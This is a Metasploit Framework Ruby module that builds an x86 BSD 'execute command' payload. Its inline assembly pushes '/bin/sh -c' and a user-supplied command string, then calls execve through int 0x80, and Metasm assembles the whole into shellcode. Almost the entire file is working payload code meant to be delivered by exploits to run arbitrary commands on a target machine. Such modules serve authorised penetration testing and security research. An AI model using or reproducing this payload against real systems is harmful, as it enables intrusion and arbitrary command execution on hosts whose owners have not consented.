## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' ### # # Exec # ---- # # Executes an arbitrary command. # ### module Metasploit3 include Msf::Payload::Single include Msf::Payload::Bsd def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Execute Command', 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'License' => MSF_LICENSE, 'Platform' => 'bsd', 'Arch' => ARCH_X86)) # Register exec options register_options( [ OptString.new('CMD', [ true, "The command string to execute" ]), ], self.class) end # # Dynamically builds the exec payload based on the user's options. # def generate_stage cmd = datastore['CMD'] || '' asm = <<-EOS ;; ; ; Name: single_exec ; Platforms: *BSD ; Author: vlad902 ; Version: $Revision$ ; License: ; ; This file is part of the Metasploit Exploit Framework ; and is subject to the same licenses and copyrights as ; the rest of this package. ; ; Description: ; ; Execute an arbitary command. ; ;; ; NULLs are fair game. push 0x3b pop eax cdq push edx push 0x632d mov edi, esp push edx push 0x68732f6e push 0x69622f2f mov ebx, esp push edx call getstr db "CMD", 0x00 getstr: push edi push ebx mov ecx, esp push edx push ecx push ebx push eax int 0x80 EOS asm.gsub!(/CMD/, cmd.gsub('"', "\\\"")) payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string end end